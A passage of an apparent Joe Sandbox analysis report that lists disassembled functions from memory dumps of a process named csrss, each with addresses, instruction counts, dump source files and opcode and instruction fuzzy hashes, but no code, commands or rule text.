                                                      • Instruction Fuzzy Hash: 5DF06D71A4E7C44FCB1AEA348868458BFA0EF67601B4A41EEC046CF1E7EA2D9885C701
                                                      Function 00007FF848E63A89 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1b155bba8e84488f59a7e0520d627fdf7e0c85e9f4cbc9179c2a97a25e109091
                                                      • Instruction ID: afac52e433d0857518583ae6b8924dc77729afd3a9f21939d5f8d0ee06b49a2d
                                                      • Opcode Fuzzy Hash: 1b155bba8e84488f59a7e0520d627fdf7e0c85e9f4cbc9179c2a97a25e109091
                                                      • Instruction Fuzzy Hash: CBE04F7194E7C54FDB0AFB34886A8543FA0EE6721178A40EED085CF1B3E62DD88AC701
                                                      Function 00007FF848E8ADE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: ab5bc52ccc84ba0a46e1ae635ea7e3e89fe45a12ed5d610c0e15ce8f43e4fa42
                                                      • Instruction ID: 828afeb58ec6ea49f52c83a1bb17ab3c40440e831410fd24b2f3616146c31bae
                                                      • Opcode Fuzzy Hash: ab5bc52ccc84ba0a46e1ae635ea7e3e89fe45a12ed5d610c0e15ce8f43e4fa42
                                                      • Instruction Fuzzy Hash: 44E0487154E7D44FCB0AEB3484698553F60EF6725578A40DEC045CF1F3E62D984AC701
                                                      Function 00007FF848E82279 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: f19cede5c59fc4a0cb08a885fad295f4731a0a1441eb08b9cec326ea9453d205
                                                      • Instruction ID: 5ca437563a1a1a717193a0ff7e6609b635dde2699c548a657d9841eeb3367ba1
                                                      • Opcode Fuzzy Hash: f19cede5c59fc4a0cb08a885fad295f4731a0a1441eb08b9cec326ea9453d205
                                                      • Instruction Fuzzy Hash: B0E01A7184E7D44FCB4AEB74886A9543FA0EF6B211B8A40EEC045CF1B3E62D8849C701
                                                      Function 00007FF848E880D9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 8ce124dc7abdcb41ee7936ee3735b78eaac60abd6b3103a33d5c690c0f19498d
                                                      • Instruction ID: e3672f46c80dc115ecc7273e3dac629158cbbb2b0e0f2e113172e60720cf181d
                                                      • Opcode Fuzzy Hash: 8ce124dc7abdcb41ee7936ee3735b78eaac60abd6b3103a33d5c690c0f19498d
                                                      • Instruction Fuzzy Hash: F4E0D87144E7C04FC706EB7488698097FA0EE2724078B40EEC045CF1B3E22D8845C701
                                                      Function 00007FF848E61349 Relevance: .5, Instructions: 537COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 933c6249fb2e24eecc1489cd62a2c5a58d931f6f1326546cca73537b7a831822
                                                      • Instruction ID: a37c06329419195b5fe935331f2d0cb3863c9be72f863cd6a41fe3d08e24b0c4
                                                      • Opcode Fuzzy Hash: 933c6249fb2e24eecc1489cd62a2c5a58d931f6f1326546cca73537b7a831822
                                                      • Instruction Fuzzy Hash: 9C025E31E1C95A8FEB99FA6884916B9B3A1FF54780F5441B9D00DD3287CF39BC828B45
                                                      Function 00007FF848E508D0 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ffbd7652aaac1a95ba09a5a227770c9d00a9739d108b62ea588d853606316154
                                                      • Instruction ID: a999fad9fd368aed81141015ee0060834d8e2247d5bb869a9a82e6692ab2c060
                                                      • Opcode Fuzzy Hash: ffbd7652aaac1a95ba09a5a227770c9d00a9739d108b62ea588d853606316154
                                                      • Instruction Fuzzy Hash: 6E415B92A4E9552EE308B7BCA0956FDBB80FF453A4F1845FBD04CC71D7DE2868818698
                                                      Function 00007FF848E51171 Relevance: .1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c8d99719bc378567cf719af897c873e6ef95af42384c07d4f4f58627ca212226
                                                      • Instruction ID: 228a175af950f982f38f92d16dcacc0d1851e0413048382c04604d501e797789
                                                      • Opcode Fuzzy Hash: c8d99719bc378567cf719af897c873e6ef95af42384c07d4f4f58627ca212226
                                                      • Instruction Fuzzy Hash: EB31707190D68A8FDB46FB64C8659A9BBF0FF26340F0805FBD009D71A2DB399845C751
                                                      Function 00007FF848E50998 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 517011e782e7eedabede6bbb1b2bca8d4bcfa00d5987e039b1d8c85eb5fc41ad
                                                      • Instruction ID: ecd0bd045a85cae50d2cb750ee94941b87bae1d6cf494d3cf290c11e1c041a4f
                                                      • Opcode Fuzzy Hash: 517011e782e7eedabede6bbb1b2bca8d4bcfa00d5987e039b1d8c85eb5fc41ad
                                                      • Instruction Fuzzy Hash: C921F120B1D9595FE788F66C844A7B9B7C2FF99755F1000F9E40EC32D6DE28AC818688
                                                      Function 00007FF848E82979 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8757069202baedebd921ed1b31c442f342e54f784ec780075ec39ace15b624da
                                                      • Instruction ID: fdadde23bb3f8bbab27ea55cc291b43a219102b404c04c86a72125737a8d8b82
                                                      • Opcode Fuzzy Hash: 8757069202baedebd921ed1b31c442f342e54f784ec780075ec39ace15b624da
                                                      • Instruction Fuzzy Hash: 77318631E0C94A8FDB54FA18C4956BC77E2FB987A4F44427AC40ED72C6CF38A9418B85
                                                      Function 00007FF848E50960 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424dcb16083359b8a07385a8893f11865e2333391f520f8989e2d54cb1a6af0a
                                                      • Instruction ID: f77b9a29282c89927d392e676bc7566e951348763eb8e1dbaa819ac613ad6401
                                                      • Opcode Fuzzy Hash: 424dcb16083359b8a07385a8893f11865e2333391f520f8989e2d54cb1a6af0a
                                                      • Instruction Fuzzy Hash: C8212891A4ED163EF65CB2BC644A6FCA2C1FF483A5F1440BAE40DC31D7DD2C68804698
                                                      Function 00007FF848E52A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d32e3ed213fe05076173ee525118aea2c9b4828e6f80ec80579c9dee9078b6f
                                                      • Instruction ID: 7e8e4a0514a9d0dc8c8617fdfba27c782613f9a2ce432c282873c4b72fb4dcee
                                                      • Opcode Fuzzy Hash: 5d32e3ed213fe05076173ee525118aea2c9b4828e6f80ec80579c9dee9078b6f
                                                      • Instruction Fuzzy Hash: 6E214161E0C90A8FEBA4FAA884547BCA2D2FF94391F5546B5D40DD3293DE38AC418748
                                                      Function 00007FF848E847CD Relevance: .1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 098383908c077743e58d5f082a83f3b561def0c71ba6caf4d8b85f466fd56e2a
                                                      • Instruction ID: ade824044f7b7ce70da989decd7b65504ac8125d5d9c863def52091015ce12df
                                                      • Opcode Fuzzy Hash: 098383908c077743e58d5f082a83f3b561def0c71ba6caf4d8b85f466fd56e2a
                                                      • Instruction Fuzzy Hash: D1219130A1CA198FDBA8EB188856BBD73F2FB58740F600079D44ED3281CF346D828B85
                                                      Function 00007FF848E50C25 Relevance: .1, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d72b2a059344ca9a45099fc1f557cf23b98df3c06ac99695896507b6237289c0
                                                      • Instruction ID: bd7b56a498f3b5dc49a0337759260d75f0c3ca1234726802dd34f676a1b58f2b
                                                      • Opcode Fuzzy Hash: d72b2a059344ca9a45099fc1f557cf23b98df3c06ac99695896507b6237289c0
                                                      • Instruction Fuzzy Hash: A621D67190D689AFE711FFA8C4552ECBBB0FF52350F1445B6E044DB1C2DB3825468755
                                                      Function 00007FF848E66D44 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c5ac5c6f397e6e13d8eeaf85f0fcdf6b03c38dee4f9392bef08223c4965f25f
                                                      • Instruction ID: a30cdf9ffeca2657aea3e24d503bc1daacc16cbe8224dd28cbaf0f4858dc47d6
                                                      • Opcode Fuzzy Hash: 3c5ac5c6f397e6e13d8eeaf85f0fcdf6b03c38dee4f9392bef08223c4965f25f
                                                      • Instruction Fuzzy Hash: ED114F21E0C91A4FEA98FB6884556B973D2FF98340F5005BAD40EE72D6DF38BC124784
                                                      Function 00007FF848E8479B Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f43fb82b878838ec2a80412cc861bf7f2fe8e663d90cc19411dbc94d9653441
                                                      • Instruction ID: f5277cd8f5299ba2f35198a29593c1241578740743f74efb6a799141c5c4d2a4
                                                      • Opcode Fuzzy Hash: 8f43fb82b878838ec2a80412cc861bf7f2fe8e663d90cc19411dbc94d9653441
                                                      • Instruction Fuzzy Hash: 7A11A030E2CA198FDB98EB1888466BA77E1FB99740F5044B9C48DD3281CF34AD818F85
                                                      Function 00007FF848E53D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ba2ce238f63109aecba46b24be2db8facca6e6befa5bf46bdb89211eb6591b5
                                                      • Instruction ID: 4bef5a812354499d5cd899f0f975a70da7f1a73c0b123f95f8cb28cd1a2d5504
                                                      • Opcode Fuzzy Hash: 9ba2ce238f63109aecba46b24be2db8facca6e6befa5bf46bdb89211eb6591b5
                                                      • Instruction Fuzzy Hash: 6E11DA70908A198FDB94EB08C894BA9B3F1FB58311F5441AAD40DE72A4CB34AEC4CF85
                                                      Function 00007FF848E50C38 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d77f783aad2458c2800b9d4d9c4553bf8df1523cdcc4391c1fce8b81b5581b6
                                                      • Instruction ID: 143c2411044347730a3b37979d6936ed83f579208d15690f45e056ff2b82a719
                                                      • Opcode Fuzzy Hash: 7d77f783aad2458c2800b9d4d9c4553bf8df1523cdcc4391c1fce8b81b5581b6
                                                      • Instruction Fuzzy Hash: 8011E57190D7899FE702FFB8C8551DDBFB0EF42350F1545B6E040DB192DA3416498784
                                                      Function 00007FF848E87180 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 069208255a8f16878afe87ed4269f670172b69dc563c41a5ec61e3c23eab89b7
                                                      • Instruction ID: 6c584eec39f5069c27b048f1c64f1530521c7b06a2682f0663f053e740078e05
                                                      • Opcode Fuzzy Hash: 069208255a8f16878afe87ed4269f670172b69dc563c41a5ec61e3c23eab89b7
                                                      • Instruction Fuzzy Hash: 85014956D8E9922ED70D76BCB8560F83B50EF0227AF4C90B7D08C8A163DE1D5089C7D9
                                                      Function 00007FF848E8D67A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 777e400bdcb17ddbea704fe2f1df7eab1b90a5bc9cf831a6d03ede6fc709789b
                                                      • Instruction ID: fb8c2fdcee2fb3825c8ad6c16712a7809050115efd7820a70ba5cfbce46d820d
                                                      • Opcode Fuzzy Hash: 777e400bdcb17ddbea704fe2f1df7eab1b90a5bc9cf831a6d03ede6fc709789b
                                                      • Instruction Fuzzy Hash: 76017132F089098FEB54EA59D4847FD73E2FB983A0F454071E01DD7181DB39A8828B54
                                                      Function 00007FF848E50C40 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 255e3edd2986af6da890c4f348543e18385608188dbd45ed46d2ca7db6518ae3
                                                      • Instruction ID: 4c9a81626f8b80b18402cd476576c98ea3f88fc4759ce3e2819838de5b43d1d4
                                                      • Opcode Fuzzy Hash: 255e3edd2986af6da890c4f348543e18385608188dbd45ed46d2ca7db6518ae3
                                                      • Instruction Fuzzy Hash: 1601C07190D7899FE702FF68C4542D9BFB0EF42350F1545B6E040DB292DA3856498784
                                                      Function 00007FF848E644B1 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a4cd38383cc3d6bc3f4f5a9d225dc607f98e32321992e968a583706b9fadbc7
                                                      • Instruction ID: 96ce92825816450565012f2c9121a35001dac107a97e1645cbd96ddc30d274a4
                                                      • Opcode Fuzzy Hash: 4a4cd38383cc3d6bc3f4f5a9d225dc607f98e32321992e968a583706b9fadbc7
                                                      • Instruction Fuzzy Hash: 9AF04C31D0C6860FE762B66484152B93791BF96354F0802BBC44ED70C3DE3CA9068355
                                                      Function 00007FF848E50C48 Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62ed21e564b9d0c8c3b40304152f559fe7db0f64d2a9551da839e6888d78b090
                                                      • Instruction ID: 03c72c77711e027b8cecfef6a0015a3f766c79b065b262f3d1abeb92a48709b4
                                                      • Opcode Fuzzy Hash: 62ed21e564b9d0c8c3b40304152f559fe7db0f64d2a9551da839e6888d78b090
                                                      • Instruction Fuzzy Hash: 2C019A7190D7899FE702FF68C8842D8BFB0EF42350F1841E6E040DB292EA386A49C780
                                                      Function 00007FF848E6833C Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd212eaee4304403d700ee7206c01cc869021635d1ce47df293de732c1a5609b
                                                      • Instruction ID: 59bb56e5e701b8bb38fb55e67d283a99e6973c20fbfe66ea38e8277bfd60e81b
                                                      • Opcode Fuzzy Hash: fd212eaee4304403d700ee7206c01cc869021635d1ce47df293de732c1a5609b
                                                      • Instruction Fuzzy Hash: CE014B21E0C85A8FFA94FA548855AA87391FF65390F5442F6D80DE72D2DF38BD428B84
                                                      Function 00007FF848E85CFD Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1e0879ce2e51a29a0114b46164552b0f34bd5842f23093ef825ff80efe66a51
                                                      • Instruction ID: 3b719e9099e82e90e9ada26b565f2b154c0acb93bd95f2f993c4407bb00679b2
                                                      • Opcode Fuzzy Hash: f1e0879ce2e51a29a0114b46164552b0f34bd5842f23093ef825ff80efe66a51
                                                      • Instruction Fuzzy Hash: 40017130A2DA198FDB98EB1884556AD77A1FF94704F5040AAC449C3285CF38A9818B45
                                                      Function 00007FF848E54F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c1ea5e040ea1c846ecc50f1307cad16a9ae30ce56970c9135266df04daa6fc7
                                                      • Instruction ID: ec91118c42f0f38d5b516f879886d74d3e769dc378e5712c28a72e638c911e0d
                                                      • Opcode Fuzzy Hash: 4c1ea5e040ea1c846ecc50f1307cad16a9ae30ce56970c9135266df04daa6fc7
                                                      • Instruction Fuzzy Hash: 7C01DF71E0D5268FEBA1BAA8C0546B9B391FF94354F1401F6C00ED3282DF382D418B44
                                                      Function 00007FF848E50C50 Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c55e2f4f696fba31dc5410f8d9a4328a81449f0cbc6605396837b47cf8eb97d2
                                                      • Instruction ID: 2369f6946d081475bcbbe0390a4d5c15ff217f29dd4d6b74ddd0b5fb5e27b8c4
                                                      • Opcode Fuzzy Hash: c55e2f4f696fba31dc5410f8d9a4328a81449f0cbc6605396837b47cf8eb97d2
                                                      • Instruction Fuzzy Hash: 5601287090D7899FE702FBA884942A9BFB0EF12354F1845E6E440DB296EA385A488745
                                                      Function 00007FF848E8AD59 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f6fed55b2d606ec73f4839205813a9a560f7cca4f3b2b447d10a174a14de459
                                                      • Instruction ID: 4ed8c043ea477c4ef486fef43331e3f133342943b812b39fad9174d789841198
                                                      • Opcode Fuzzy Hash: 2f6fed55b2d606ec73f4839205813a9a560f7cca4f3b2b447d10a174a14de459
                                                      • Instruction Fuzzy Hash: 35F0EC31B0CBD44FC729553D54550617FF1DB5B60234902EFC086C76E3DD54AC868781
                                                      Function 00007FF848E52B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: d64427c136db92936d8562b428aee26614512583f071d1797a377af5398fd510
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: E2F04F7094C85E8EEBB4FA54C8446F8B3A2FF90391F5442B5D00DD31A2DF78A9C18B48
                                                      Function 00007FF848E63FBF Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc55377851fb8f2b424eea3a09fd1ec907400c0a3e5872b5bbc0f6ebdb472935
                                                      • Instruction ID: a4ca90bd5351c3e89d3c711e40f6289ae7b429ef34a66c6dce0c6e30b749683e
                                                      • Opcode Fuzzy Hash: dc55377851fb8f2b424eea3a09fd1ec907400c0a3e5872b5bbc0f6ebdb472935
                                                      • Instruction Fuzzy Hash: 8AF04970E0890B8FEB98EA4DC8556FE77B1FB54351F00063AC016D3285DF3869428B84
                                                      Function 00007FF848E50B77 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e50000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a490861116e8e69671a6ecb08362713a797288d0051d210d70fd1fe935f2f0d9
                                                      • Instruction ID: c59a2b190a08917693f74a9353c94acd76424994809daee63970a9379735a67f
                                                      • Opcode Fuzzy Hash: a490861116e8e69671a6ecb08362713a797288d0051d210d70fd1fe935f2f0d9
                                                      • Instruction Fuzzy Hash: 8DF0A03925EA85DFD346EB3DC8A58D5BF60FF07204B5601EAD089CB463C315589DCB51
                                                      Function 00007FF848E8B0DA Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000020.00000002.2389402466.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_32_2_7ff848e81000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e495da3fe376052116846afbada5c410e37c1102820373cb9de99df49352bde9
                                                      • Instruction ID: 332327530b5825f6e1a815623e0b438931fd69f7bfe3828ec3eff07aa61addf1
                                                      • Opcode Fuzzy Hash: e495da3fe376052116846afbada5c410e37c1102820373cb9de99df49352bde9
                                                      • Instruction Fuzzy Hash: 3CF05E20E1DD0A8FE295FB1940993BDB2D1FB98781F9401B5C40DC3283DF3868819345
                                                      Function 00007FF848E647C4 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
